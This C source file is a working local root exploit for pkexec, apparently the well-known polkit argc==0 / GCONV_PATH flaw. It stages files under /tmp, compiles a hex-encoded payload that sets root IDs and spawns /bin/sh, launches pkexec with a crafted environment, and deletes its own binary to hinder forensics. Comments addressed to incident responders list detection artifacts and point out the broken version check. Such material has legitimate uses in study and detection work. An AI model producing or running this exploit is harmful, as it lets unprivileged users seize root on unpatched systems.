#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <string.h>
#include <signal.h>
#include <wait.h>
#include <fcntl.h>
/* Absolute paths used by the rest of the file: the compiler that
 * exploitVuln() invokes and the setuid target that checkConditions()
 * probes and exploitVuln() finally executes. Both are only checked for
 * existence (access(F_OK)); neither is checked for mode bits or ownership.
 * Declared as unsigned char * but passed to APIs expecting char *. */
unsigned char *compile = "/usr/bin/gcc";
unsigned char *path = "/usr/bin/pkexec";
/* Forward declarations; the definitions follow below in this file. */
int checkConditions(void);
void exploitVuln(void);
void sighandler(int signum);
/* SIGSEGV handler installed by main(). The author treats a crash of this
 * process as evidence that pkexec lacks the setuid bit; nothing here or in
 * checkConditions() actually inspects the target's mode bits (no stat()),
 * so the message is an assumption, not a verified diagnosis. Note the text
 * names /bin/pkexec while `path` points at /usr/bin/pkexec. Terminates the
 * process with status 0; never returns. */
void sighandler(int signum){
fprintf(stderr, "/bin/pkexec - suid bit is not set to the binary (Not Vulnerable)\n");
_exit(0);
}
/* Pre-flight check. Exits the process if gcc or pkexec is absent, otherwise
 * runs `pkexec --version`, captures its stdout through a pipe, takes the
 * third whitespace-separated token as the version string and compares it
 * with "0.105" via strverscmp().
 *
 * Returns -1 when the reported version sorts after 0.105, 1 otherwise.
 * Both values are non-zero, so a caller testing the result for truth (as
 * main() does) cannot distinguish the two outcomes.
 *
 * For responders: the verdict this produces is not a reliable assessment
 * of patch state — the read() result is not examined, `version` is only
 * NUL-terminated if a newline happens to be inside the 32 bytes read, and
 * the token position is assumed. Determine patch state from the package
 * manager / vendor advisory, not from this tool's output. The
 * `pkexec --version` child is itself observable in process telemetry
 * (parent running from /tmp after main()'s chdir). */
int checkConditions(void){
if (access(compile, F_OK)){
fprintf(stderr, "/bin/gcc - not installed considered using a 'self-contained' binary\n");
_exit(-1);
}
if (access(path, F_OK)){
fprintf(stderr, "%s - Is not available (Nothing to exploit)", path);
_exit(1);
}
int pipefds[2]; pid_t pid; char version[32];
if (pipe(pipefds)) abort();
pid = fork();
if (pid < 0){
close(pipefds[0]);
close(pipefds[1]);
_exit(-1);
}
if(!pid){
/* Child: stdout -> pipe, then replace with `pkexec --version`.
 * If execv fails the child falls through into the parent's code path. */
close(pipefds[0]);
dup2(pipefds[1], 1);
char *args[] = {path, "--version", NULL};
execv(path, args);
}
waitpid(pid, NULL, 0);
close(pipefds[1]);
/* Single read; result (byte count / error) is discarded. */
read(pipefds[0], version, sizeof version);
version[strcspn(version, "\n")] = 0x0;
/* Skip the first two tokens; pch ends up on the third (may be NULL). */
char *pch = strtok(version, " ");
int count = 2;
while(count > 0){pch = strtok(NULL, " "); count--;}
if (strverscmp(pch, "0.105") > 0)
return -1;
return 1;
}
/* Stages the on-disk artifacts, builds the shared object with gcc, then
 * replaces this process with pkexec run with an empty argv and a crafted
 * environment. On success execve() does not return.
 *
 * Everything is created relative to the current directory, which main()
 * has set to /tmp. Host artifacts a responder can look for:
 *   - a directory literally named "GCONV_PATH=." containing an empty
 *     file "tmp" (mkdir/open below);
 *   - a "tmp/" directory containing gconv-modules, preload.c and the
 *     compiled preload.so;
 *   - a gcc child process spawned by an unprivileged user from /tmp;
 *   - pkexec executed with argc == 0 and an environment containing
 *     "CHARSET=EXPLOIT", "SHELL=xxx" and "PATH=GCONV_PATH=." (see
 *     pkexec_envp). The "tmp" entry at the front of that environment
 *     array is not of KEY=VALUE form.
 * Patching polkit, or removing the setuid bit from pkexec, removes the
 * precondition this relies on; the file contents below are plain ASCII
 * stored as byte arrays (a trivial obfuscation of string literals). */
void exploitVuln(){
// this is where we exploit the vulnerability
char *compile_args[] = {compile, "-shared", "-fPIC", "-o", "./tmp/preload.so", "./tmp/preload.c", NULL};
char *pkexec_args[] = {NULL};
char *pkexec_envp[] = {"tmp", "CHARSET=EXPLOIT", "SHELL=xxx", "PATH=GCONV_PATH=.", NULL};
/* Contents written to ./tmp/gconv-modules (NUL-terminated ASCII). */
char buffer[] = {
0x6d, 0x6f, 0x64, 0x75, 0x6c, 0x65, 0x20, 0x55, 0x54, 0x46, 0x2d, 0x38, 0x2f, 0x2f, 0x20,
0x45, 0x58, 0x50, 0x4c, 0x4f, 0x49, 0x54, 0x2f, 0x2f, 0x20, 0x70, 0x72, 0x65, 0x6c, 0x6f,
0x61, 0x64, 0x20, 0x32, 0x0
};
/* C source written to ./tmp/preload.c and compiled by gcc below (NUL-terminated ASCII). */
char code[] = {0x23, 0x69, 0x6e, 0x63, 0x6c, 0x75, 0x64, 0x65, 0x20, 0x3c, 0x73, 0x74, 0x64, 0x6c, 0x69, 0x62, 0x2e, 0x68, 0x3e, 0xa, 0x23, 0x69, 0x6e, 0x63, 0x6c, 0x75, 0x64, 0x65, 0x20, 0x3c, 0x75, 0x6e, 0x69, 0x73, 0x74, 0x64, 0x2e, 0x68, 0x3e, 0xa, 0xa, 0x76, 0x6f, 0x69, 0x64, 0x20, 0x67, 0x63, 0x6f, 0x6e, 0x76, 0x28, 0x29, 0x7b, 0x7d, 0xa, 0xa, 0x76, 0x6f, 0x69, 0x64, 0x20, 0x67, 0x63, 0x6f, 0x6e, 0x76, 0x5f, 0x69, 0x6e, 0x69, 0x74, 0x28, 0x29, 0x7b, 0xa, 0x9, 0x73, 0x65, 0x74, 0x72, 0x65, 0x75, 0x69, 0x64, 0x28, 0x30, 0x2c, 0x20, 0x30, 0x29, 0x3b, 0xa, 0x9, 0x73, 0x65, 0x74, 0x72, 0x65, 0x67, 0x69, 0x64, 0x28, 0x30, 0x2c, 0x20, 0x30, 0x29, 0x3b, 0xa, 0x9, 0x63, 0x68, 0x61, 0x72, 0x20, 0x2a, 0x61, 0x72, 0x67, 0x73, 0x5b, 0x5d, 0x20, 0x3d, 0x20, 0x7b, 0x22, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x22, 0x2c, 0x20, 0x4e, 0x55, 0x4c, 0x4c, 0x7d, 0x3b, 0xa, 0x9, 0x63, 0x68, 0x61, 0x72, 0x20, 0x2a, 0x65, 0x6e, 0x76, 0x70, 0x5b, 0x5d, 0x20, 0x3d, 0x20, 0x7b, 0x22, 0x50, 0x41, 0x54, 0x48, 0x3d, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x67, 0x61, 0x6d, 0x65, 0x73, 0x3a, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x6c, 0x6f, 0x63, 0x61, 0x6c, 0x2f, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x22, 0x2c, 0x20, 0x4e, 0x55, 0x4c, 0x4c, 0x7d, 0x3b, 0xa, 0xa, 0x9, 0x65, 0x78, 0x65, 0x63, 0x76, 0x65, 0x28, 0x61, 0x72, 0x67, 0x73, 0x5b, 0x30, 0x5d, 0x2c, 0x20, 0x61, 0x72, 0x67, 0x73, 0x2c, 0x20, 0x65, 0x6e, 0x76, 0x70, 0x29, 0x3b, 0xa, 0x7d, 0xa, 0x0};
unsigned int fd, total = 0, got = 1;
/* Filesystem staging under the current directory (/tmp, set by main()). */
mkdir("GCONV_PATH=.", 0755);
open("GCONV_PATH=./tmp", O_CREAT, 0755);
mkdir("tmp", 0755);
fd = open("./tmp/gconv-modules", O_CREAT|O_WRONLY, 0755);
if (fd <0) abort();
/* Byte-at-a-time write of `buffer`, stopping on the first short write. */
while(got == 1 && *buffer != 0x0 && total < strlen(buffer)){
got = write(fd, (char *)(buffer + total), 1);
total++;
}
close(fd);
fd = open("./tmp/preload.c", O_CREAT|O_WRONLY, 0644);
if (fd < 0) abort();
got = 1; total = 0;
/* Same byte-at-a-time write for `code`; this descriptor is not closed. */
while(got == 1 && *code != 0x0 && total < strlen(code)){
got = write(fd, (char *)(code + total), 1);
total++;
}
pid_t pid;
/* Child runs gcc with compile_args; parent waits for it to finish. */
pid = vfork();
if(pid < 0) abort();
if (!pid){
execv(compile, compile_args);
}
waitpid(pid, NULL, 0);
/* Replace this process with pkexec: empty argv, crafted environment. */
execve(path, pkexec_args, pkexec_envp);
}
/* Entry point. Installs sighandler() for SIGSEGV, deletes its own
 * executable from disk (unlink(argv[0]) — anti-forensic: the binary is
 * gone before anything else runs, so the durable artifacts are the ones
 * exploitVuln() leaves under /tmp), changes directory to /tmp, and runs
 * the checks.
 *
 * checkConditions() returns either 1 or -1, both of which are true here,
 * so the else branch is unreachable: once gcc and pkexec exist,
 * exploitVuln() is always attempted regardless of the version reported.
 * On a patched host this still creates the staging files and spawns gcc
 * and pkexec, which is useful for detection. `act` is not zero-initialised
 * before sigaction(), so sa_flags holds an indeterminate value. */
int main(int argc, char **argv){
struct sigaction act;
act.sa_handler = &sighandler;
sigemptyset(&act.sa_mask);
sigaction(SIGSEGV, &act, NULL);
unlink(argv[0]);
chdir("/tmp");
if (checkConditions()){
fprintf(stderr, "---[ version() is vulnerable\n");
exploitVuln();
}else fprintf(stderr, "---[ version() doesn't seem vulnerable\n");
}